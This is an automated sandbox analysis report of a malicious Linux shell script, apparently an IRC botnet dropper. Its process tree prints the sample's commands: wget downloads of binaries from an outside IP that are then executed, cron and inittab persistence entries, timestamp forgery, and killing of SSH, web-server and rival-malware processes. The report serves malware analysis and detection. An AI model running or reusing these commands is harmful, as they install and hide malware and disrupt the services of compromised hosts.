Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 1.sh

Overview

General Information

Sample Name:1.sh
Analysis ID:375606
MD5:65fc26f78151a04e71dd86ca38cf4fd2
SHA1:3adf311b9e97dac5ccd95cf9c992c17e5c3ffabd
SHA256:864d438887ea34ffd06b03695267e93b48e73ec0f39d047968a1cce44448c581
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Executes the "crontab" command typically for achieving persistence
Explicitly modifies time stamps using the "touch" command
Machine Learning detection for dropped file
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using cron
Terminates several processes with shell command 'killall'
Uses IRC for communication with a C&C
Uses known network protocols on non-standard ports
Writes identical ELF files to multiple locations
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "grep" command used to find patterns in files or piped streams
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "touch" command used to create files or modify time stamps
Executes the "wget" command typically used for HTTP/S downloading
Sample contains strings that are potentially command strings
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • sh (PID: 4580, Parent: 4517, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh /tmp/1.sh
    • sh New Fork (PID: 4585, Parent: 4580)
    • wget (PID: 4585, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty0 -O /var/run/tty0
    • sh New Fork (PID: 4603, Parent: 4580)
    • chmod (PID: 4603, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty0
    • sh New Fork (PID: 4604, Parent: 4580)
    • chmod (PID: 4604, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty0
    • sh New Fork (PID: 4605, Parent: 4580)
    • sh New Fork (PID: 4606, Parent: 4580)
    • wget (PID: 4606, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty1 -O /var/run/tty1
    • sh New Fork (PID: 4635, Parent: 4580)
    • chmod (PID: 4635, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty1
    • sh New Fork (PID: 4636, Parent: 4580)
    • chmod (PID: 4636, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty1
    • sh New Fork (PID: 4637, Parent: 4580)
    • sh New Fork (PID: 4638, Parent: 4580)
    • wget (PID: 4638, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty2 -O /var/run/tty2
    • sh New Fork (PID: 4667, Parent: 4580)
    • chmod (PID: 4667, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty2
    • sh New Fork (PID: 4668, Parent: 4580)
    • chmod (PID: 4668, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty2
    • sh New Fork (PID: 4669, Parent: 4580)
    • sh New Fork (PID: 4670, Parent: 4580)
    • wget (PID: 4670, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty3 -O /var/run/tty3
    • sh New Fork (PID: 4699, Parent: 4580)
    • chmod (PID: 4699, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty3
    • sh New Fork (PID: 4700, Parent: 4580)
    • chmod (PID: 4700, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty3
    • sh New Fork (PID: 4701, Parent: 4580)
    • sh New Fork (PID: 4702, Parent: 4580)
    • wget (PID: 4702, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty4 -O /var/run/tty4
    • sh New Fork (PID: 4731, Parent: 4580)
    • chmod (PID: 4731, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty4
    • sh New Fork (PID: 4732, Parent: 4580)
    • chmod (PID: 4732, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty4
    • sh New Fork (PID: 4733, Parent: 4580)
    • sh New Fork (PID: 4734, Parent: 4580)
    • wget (PID: 4734, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty5 -O /var/run/tty5
    • sh New Fork (PID: 4763, Parent: 4580)
    • chmod (PID: 4763, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty5
    • sh New Fork (PID: 4764, Parent: 4580)
    • chmod (PID: 4764, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty5
    • sh New Fork (PID: 4765, Parent: 4580)
    • sh New Fork (PID: 4766, Parent: 4580)
    • wget (PID: 4766, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty6 -O /var/run/tty6
    • sh New Fork (PID: 4795, Parent: 4580)
    • chmod (PID: 4795, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty6
    • sh New Fork (PID: 4796, Parent: 4580)
    • chmod (PID: 4796, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty6
    • sh New Fork (PID: 4797, Parent: 4580)
    • sh New Fork (PID: 4798, Parent: 4580)
    • wget (PID: 4798, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/pty -O pty
    • sh New Fork (PID: 4827, Parent: 4580)
    • chmod (PID: 4827, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x pty
    • sh New Fork (PID: 4828, Parent: 4580)
    • chmod (PID: 4828, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 pty
    • sh New Fork (PID: 4829, Parent: 4580)
    • pty (PID: 4829, Parent: 4580, MD5: unknown) Arguments: ./pty
      • pty New Fork (PID: 4831, Parent: 4829)
        • pty New Fork (PID: 4832, Parent: 4831)
        • sh (PID: 4832, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"
          • sh New Fork (PID: 4833, Parent: 4832)
          • rm (PID: 4833, Parent: 4832, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/wgsh
        • pty New Fork (PID: 4834, Parent: 4831)
        • sh (PID: 4834, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"
          • sh New Fork (PID: 4883, Parent: 4834)
          • rm (PID: 4883, Parent: 4834, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/bbsh
        • pty New Fork (PID: 4884, Parent: 4831)
        • sh (PID: 4884, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"
          • sh New Fork (PID: 4901, Parent: 4884)
          • rm (PID: 4901, Parent: 4884, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/pty
        • pty New Fork (PID: 4902, Parent: 4831)
        • sh (PID: 4902, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 arm > /dev/null 2>&1 &"
          • sh New Fork (PID: 4903, Parent: 4902)
          • killall (PID: 4903, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 arm
        • pty New Fork (PID: 4904, Parent: 4831)
        • sh (PID: 4904, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mips > /dev/null 2>&1 &"
          • sh New Fork (PID: 4906, Parent: 4904)
          • killall (PID: 4906, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mips
        • pty New Fork (PID: 4909, Parent: 4831)
        • sh (PID: 4909, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mipsel > /dev/null 2>&1 &"
          • sh New Fork (PID: 4933, Parent: 4909)
          • killall (PID: 4933, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mipsel
        • pty New Fork (PID: 4936, Parent: 4831)
        • sh (PID: 4936, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 powerpc > /dev/null 2>&1 &"
          • sh New Fork (PID: 4960, Parent: 4936)
          • killall (PID: 4960, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 powerpc
        • pty New Fork (PID: 4961, Parent: 4831)
        • sh (PID: 4961, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 ppc > /dev/null 2>&1 &"
          • sh New Fork (PID: 4989, Parent: 4961)
          • killall (PID: 4989, Parent: 4961, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 ppc
        • pty New Fork (PID: 4993, Parent: 4831)
        • sh (PID: 4993, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 5001, Parent: 4993)
          • killall (PID: 5001, Parent: 4993, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.armv4l.mod
        • pty New Fork (PID: 5004, Parent: 4831)
        • sh (PID: 5004, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 5029, Parent: 5004)
          • killall (PID: 5029, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.i686.mod
        • pty New Fork (PID: 5033, Parent: 4831)
        • sh (PID: 5033, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 5036, Parent: 5033)
          • killall (PID: 5036, Parent: 5033, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.mips.mod
        • pty New Fork (PID: 5038, Parent: 4831)
        • sh (PID: 5038, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 5045, Parent: 5038)
          • killall (PID: 5045, Parent: 5038, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.mipsel.mod
        • pty New Fork (PID: 5049, Parent: 4831)
        • sh (PID: 5049, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 5064, Parent: 5049)
            • sh New Fork (PID: 5067, Parent: 5064)
            • cat (PID: 5067, Parent: 5064, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /tmp/.xs/*.pid
        • pty New Fork (PID: 5068, Parent: 4831)
        • sh (PID: 5068, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"
          • sh New Fork (PID: 5078, Parent: 5068)
          • rm (PID: 5078, Parent: 5068, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /tmp/.xs/*
        • pty New Fork (PID: 5082, Parent: 4831)
        • sh (PID: 5082, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chmod 700 /tmp/pty > /dev/null 2>&1 &"
          • sh New Fork (PID: 5093, Parent: 5082)
          • chmod (PID: 5093, Parent: 5082, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /tmp/pty
        • pty New Fork (PID: 5098, Parent: 4831)
        • sh (PID: 5098, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /tmp/pty"
          • sh New Fork (PID: 5108, Parent: 5098)
          • touch (PID: 5108, Parent: 5098, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /tmp/pty
        • pty New Fork (PID: 5125, Parent: 4831)
        • sh (PID: 5125, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "(crontab -l | grep -v \"/tmp/pty\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
          • sh New Fork (PID: 5141, Parent: 5125)
            • sh New Fork (PID: 5149, Parent: 5141)
            • crontab (PID: 5149, Parent: 5141, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
            • sh New Fork (PID: 5152, Parent: 5141)
            • grep (PID: 5152, Parent: 5141, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/pty
            • sh New Fork (PID: 5154, Parent: 5141)
            • grep (PID: 5154, Parent: 5141, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v "no cron"
            • sh New Fork (PID: 5156, Parent: 5141)
            • grep (PID: 5156, Parent: 5141, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v lesshts/run.sh
        • pty New Fork (PID: 5199, Parent: 4831)
        • sh (PID: 5199, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"* * * * * /tmp/pty > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
        • pty New Fork (PID: 5205, Parent: 4831)
        • sh (PID: 5205, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "crontab /var/run/.x001804289383"
          • sh New Fork (PID: 5209, Parent: 5205)
          • crontab (PID: 5209, Parent: 5205, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab /var/run/.x001804289383
        • pty New Fork (PID: 5226, Parent: 4831)
        • sh (PID: 5226, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/.x001804289383"
          • sh New Fork (PID: 5227, Parent: 5226)
          • rm (PID: 5227, Parent: 5226, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/.x001804289383
        • pty New Fork (PID: 5233, Parent: 4831)
        • sh (PID: 5233, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5243, Parent: 5233)
          • uname (PID: 5243, Parent: 5233, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • pty New Fork (PID: 5262, Parent: 4831)
        • sh (PID: 5262, Parent: 4831, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5268, Parent: 5262)
          • uname (PID: 5268, Parent: 5262, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • pty New Fork (PID: 8335, Parent: 4831)
          • pty New Fork (PID: 8336, Parent: 8335)
          • sh (PID: 8336, Parent: 8335, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 & "
            • sh New Fork (PID: 8337, Parent: 8336)
              • sh New Fork (PID: 8338, Parent: 8337)
              • cat (PID: 8338, Parent: 8337, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/dropbear.pid
              • sh New Fork (PID: 8339, Parent: 8337)
              • cat (PID: 8339, Parent: 8337, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/sshd.pid
              • sh New Fork (PID: 8340, Parent: 8337)
              • killall (PID: 8340, Parent: 8337, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 sshd dropbear
              • sh New Fork (PID: 8373, Parent: 8337)
              • pidof (PID: 8373, Parent: 8337, MD5: 1927a3fb9f656f7b53b72c92cbbecfe9) Arguments: pidof sshd
              • sh New Fork (PID: 8382, Parent: 8337)
              • pidof (PID: 8382, Parent: 8337, MD5: 1927a3fb9f656f7b53b72c92cbbecfe9) Arguments: pidof dropbear
    • sh New Fork (PID: 4830, Parent: 4580)
    • wget (PID: 4830, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/irq0 -O irq0
    • sh New Fork (PID: 5280, Parent: 4580)
    • chmod (PID: 5280, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x irq0
    • sh New Fork (PID: 5281, Parent: 4580)
    • chmod (PID: 5281, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 irq0
    • sh New Fork (PID: 5282, Parent: 4580)
    • irq0 (PID: 5282, Parent: 4580, MD5: unknown) Arguments: /usr/bin/qemu-arm ./irq0
      • irq0 New Fork (PID: 5317, Parent: 5282)
      • sh (PID: 5317, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chmod 700 /tmp/irq0 > /dev/null 2>&1 &"
        • sh New Fork (PID: 5319, Parent: 5317)
        • chmod (PID: 5319, Parent: 5317, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /tmp/irq0
      • irq0 New Fork (PID: 5320, Parent: 5282)
      • sh (PID: 5320, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /tmp/irq0"
        • sh New Fork (PID: 5322, Parent: 5320)
        • touch (PID: 5322, Parent: 5320, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /tmp/irq0
      • irq0 New Fork (PID: 5323, Parent: 5282)
      • sh (PID: 5323, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "(crontab -l | grep -v \"/tmp/irq0\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
        • sh New Fork (PID: 5325, Parent: 5323)
          • sh New Fork (PID: 5326, Parent: 5325)
          • crontab (PID: 5326, Parent: 5325, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
          • sh New Fork (PID: 5327, Parent: 5325)
          • grep (PID: 5327, Parent: 5325, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq0
          • sh New Fork (PID: 5328, Parent: 5325)
          • grep (PID: 5328, Parent: 5325, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5329, Parent: 5325)
          • grep (PID: 5329, Parent: 5325, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v lesshts/run.sh
      • irq0 New Fork (PID: 5345, Parent: 5282)
      • sh (PID: 5345, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"* * * * * /tmp/irq0 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
      • irq0 New Fork (PID: 5404, Parent: 5282)
      • sh (PID: 5404, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "crontab /var/run/.x00740882966"
        • sh New Fork (PID: 5414, Parent: 5404)
        • crontab (PID: 5414, Parent: 5404, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab /var/run/.x00740882966
      • irq0 New Fork (PID: 5415, Parent: 5282)
      • sh (PID: 5415, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/.x00740882966"
        • sh New Fork (PID: 5437, Parent: 5415)
        • rm (PID: 5437, Parent: 5415, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/.x00740882966
      • irq0 New Fork (PID: 5438, Parent: 5282)
      • sh (PID: 5438, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/irq0\" > /etc/inittab2"
        • sh New Fork (PID: 5440, Parent: 5438)
        • cat (PID: 5440, Parent: 5438, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5441, Parent: 5438)
        • grep (PID: 5441, Parent: 5438, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq0
      • irq0 New Fork (PID: 5478, Parent: 5282)
      • sh (PID: 5478, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/irq0\" >> /etc/inittab2"
      • irq0 New Fork (PID: 5480, Parent: 5282)
      • sh (PID: 5480, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5482, Parent: 5480)
        • cat (PID: 5482, Parent: 5480, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab2
      • irq0 New Fork (PID: 5483, Parent: 5282)
      • sh (PID: 5483, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5485, Parent: 5483)
        • rm (PID: 5485, Parent: 5483, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /etc/inittab2
      • irq0 New Fork (PID: 5489, Parent: 5282)
      • sh (PID: 5489, Parent: 5282, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5514, Parent: 5489)
        • touch (PID: 5514, Parent: 5489, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /etc/inittab
      • irq0 New Fork (PID: 5545, Parent: 5282)
        • irq0 New Fork (PID: 5547, Parent: 5545)
        • sh (PID: 5547, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5549, Parent: 5547)
          • uname (PID: 5549, Parent: 5547, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq0 New Fork (PID: 5550, Parent: 5545)
        • sh (PID: 5550, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5552, Parent: 5550)
          • uname (PID: 5552, Parent: 5550, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq0 New Fork (PID: 5553, Parent: 5545)
        • sh (PID: 5553, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5591, Parent: 5553)
          • uname (PID: 5591, Parent: 5553, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq0 New Fork (PID: 5607, Parent: 5545)
        • sh (PID: 5607, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 5609, Parent: 5607)
            • sh New Fork (PID: 5610, Parent: 5609)
            • cat (PID: 5610, Parent: 5609, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/httpd.pid
        • irq0 New Fork (PID: 5611, Parent: 5545)
        • sh (PID: 5611, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service httpd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 5613, Parent: 5611)
          • service (PID: 5613, Parent: 3310, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service httpd stop
            • service New Fork (PID: 5653, Parent: 5613)
            • basename (PID: 5653, Parent: 5613, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5673, Parent: 5613)
            • basename (PID: 5673, Parent: 5613, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5692, Parent: 5613)
            • systemctl (PID: 5692, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 5753, Parent: 5613)
              • service New Fork (PID: 5754, Parent: 5753)
              • systemctl (PID: 5754, Parent: 5753, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 5755, Parent: 5753)
              • sed (PID: 5755, Parent: 5753, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 6015, Parent: 5613)
            • systemctl (PID: 6015, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 6060, Parent: 5613)
            • systemctl (PID: 6060, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 6185, Parent: 5613)
            • systemctl (PID: 6185, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 6381, Parent: 5613)
            • systemctl (PID: 6381, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 6453, Parent: 5613)
            • systemctl (PID: 6453, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 6478, Parent: 5613)
            • systemctl (PID: 6478, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 6506, Parent: 5613)
            • systemctl (PID: 6506, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 6535, Parent: 5613)
            • systemctl (PID: 6535, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 6567, Parent: 5613)
            • systemctl (PID: 6567, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 6581, Parent: 5613)
            • systemctl (PID: 6581, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 6605, Parent: 5613)
            • systemctl (PID: 6605, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 6628, Parent: 5613)
            • systemctl (PID: 6628, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 6659, Parent: 5613)
            • systemctl (PID: 6659, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 6691, Parent: 5613)
            • systemctl (PID: 6691, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 6750, Parent: 5613)
            • systemctl (PID: 6750, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 6777, Parent: 5613)
            • systemctl (PID: 6777, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 6812, Parent: 5613)
            • systemctl (PID: 6812, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 6848, Parent: 5613)
            • systemctl (PID: 6848, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 6870, Parent: 5613)
            • systemctl (PID: 6870, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 6903, Parent: 5613)
            • systemctl (PID: 6903, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
